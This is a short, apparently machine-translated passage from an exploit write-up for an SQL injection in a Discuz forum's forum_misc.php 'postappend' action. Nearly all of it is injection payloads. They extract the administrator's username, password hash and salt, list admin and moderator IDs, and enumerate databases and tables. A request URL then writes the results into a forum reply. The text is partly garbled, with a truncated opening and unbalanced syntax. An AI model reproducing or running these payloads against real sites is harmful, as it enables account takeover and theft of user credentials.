A', 'subobject' = (/*! Select */concat (username, '|', password, '|', salt) from pre_ucenter_members where uid = 1 limit 0, 1), comment ='
Then, some statements are provided.
', 'Subobject' = (/*! Select */group_concat (uid, ':') from pre_common_member where groupid = 1), comment = '// view the Management User
', 'Subobject' = (/*! Select */group_concat (uid, ':') from pre_common_member where groupid = 2), comment = '// super moderator
', 'Subobject' = (/*! Select */group_concat (uid, ':') from pre_common_member where groupid = 3), comment = '// super moderator
', 'Subobject' = (/*! Select */table_name from information_schema.tables where table_schema = 0x0000 limit 0, 1), comment = '// run the table
', 'Subobject' = (/*! Select */group_concat (schema_name) from information_schema.schemata), comment = '// obtain all databases
', 'Subobject' = (/*! Select */concat (@ version, ':', user (), ':', database (), comment = '// version information
Then, add the injection statement to the reply and supplement.
Supplemental address:
Forum. php? Mod = misc & tid = {tid} & action = postappend & pid = {pid}
The preceding statement writes the obtained content into the reply topic and returns the result.
Vulnerability files:
Source \ module \ forum \ forum_misc.php